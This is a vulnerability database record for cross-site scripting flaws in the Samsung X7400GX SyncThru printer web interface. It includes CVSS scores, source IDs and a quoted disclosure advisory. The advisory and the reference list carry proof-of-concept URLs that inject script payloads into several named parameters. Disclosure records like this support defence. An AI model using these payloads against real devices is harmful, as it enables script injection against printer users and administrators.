var-201903-0464
Vulnerability from variot
SAMSUNG X7400GX SyncThru Web Service contains a cross-site scripting vulnerability. Information may be obtained and information may be falsified. The vulnerability stems from the lack of correct verification of client data in web applications. An attacker could exploit this vulnerability to execute client-side code.
<!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE: CVE-2019-7418
Category: webapps
- Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
- Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT>
- Solution:
Update to the last version of this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201903-0464", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "syncthru web service", "scope": "eq", "trust": 1.0, "vendor": "samsung", "version": null }, { "model": "x7400gx", "scope": "eq", "trust": 1.0, "vendor": "samsung", "version": "6.a6.25" }, { "model": "syncthru web service", "scope": null, "trust": 0.8,
"vendor": "samsung", "version": null }, { "model": "x7400gx", "scope": null, "trust": 0.8, "vendor": "samsung", "version": null } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "NVD", "id": "CVE-2019-7421" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:samsung:syncthru_web_service", "vulnerable": true }, { "cpe22Uri": "cpe:/o:samsung:x7400gx_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002760" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Rafael Pedrero", "sources": [ { "db": "PACKETSTORM", "id": "151584" } ], "trust": 0.1 }, "cve": "CVE-2019-7421", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": 
"CVE-2019-7421", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-158856", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "id": "CVE-2019-7421", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-7421", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2019-7421", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201902-577", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-158856", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-158856" }, { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "CNNVD", "id": "CNNVD-201902-577" }, { "db": "NVD", "id": "CVE-2019-7421" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. 
The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. Description\n\nXSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25\nV11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters:\nflag, frame, func, and Nfunc. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n 
flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. 
\nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. 
\nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. 
Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "VULHUB", "id": "VHN-158856" }, { "db": "PACKETSTORM", "id": "151584" } ], "trust": 0.9 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-7421", "trust": 2.6 }, { "db": "PACKETSTORM", "id": "151584", "trust": 2.6 }, { "db": "JVNDB", "id": "JVNDB-2019-002760", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201902-577", "trust": 0.7 }, { "db": "VULHUB", "id": "VHN-158856", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-158856" }, { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "PACKETSTORM", "id": "151584" }, { "db": "CNNVD", "id": "CNNVD-201902-577" }, { "db": "NVD", "id": "CVE-2019-7421" } ] }, "id": "VAR-201903-0464", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-158856" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T22:12:08.701000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { 
"@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.samsung.com/" }, { "title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89375" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "CNNVD", "id": "CNNVD-201902-577" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-158856" }, { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "NVD", "id": "CVE-2019-7421" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html" }, { "trust": 1.8, "url": "http://www.samsung.com/support/productsupport/download/index.aspx" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2019/feb/28" }, { "trust": 1.7, "url": "http://www.samsungprinter.com/" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7421" }, { "trust": 0.1, "url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg" }, { "trust": 0.1, "url": 
"http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento" }, { "trust": 0.1, "url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419" }, { "trust": 0.1, "url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg" }, { "trust": 0.1, "url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules" }, { "trust": 0.1, "url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login" }, { "trust": 0.1, "url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org" }, { "trust": 0.1, "url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento" }, { "trust": 0.1, "url": "http://www.samsungprinter.com/," }, { "trust": 0.1, "url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420" }, { "trust": 0.1, "url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg" }, { "trust": 0.1, "url": 
"http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed" } ], "sources": [ { "db": "VULHUB", "id": "VHN-158856" }, { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "PACKETSTORM", "id": "151584" }, { "db": "CNNVD", "id": "CNNVD-201902-577" }, { "db": "NVD", "id": "CVE-2019-7421" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-158856" }, { "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "db": "PACKETSTORM", "id": "151584" }, { "db": "CNNVD", "id": "CNNVD-201902-577" }, { "db": "NVD", "id": "CVE-2019-7421" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-03-21T00:00:00", "db": "VULHUB", "id": "VHN-158856" }, { "date": "2019-04-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "date": "2019-02-08T02:22:22", "db": "PACKETSTORM", "id": "151584" }, { "date": "2019-02-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201902-577" }, { "date": "2019-03-21T16:01:13.063000", "db": "NVD", "id": "CVE-2019-7421" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-03-25T00:00:00", "db": "VULHUB", "id": "VHN-158856" }, { "date": "2019-04-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-002760" }, { "date": "2019-04-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201902-577" }, { "date": "2024-11-21T04:48:11.733000", "db": "NVD", "id": "CVE-2019-7421" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201902-577" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002760" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "xss", "sources": [ { "db": "PACKETSTORM", "id": "151584" }, { "db": "CNNVD", "id": "CNNVD-201902-577" } ], "trust": 0.7 } }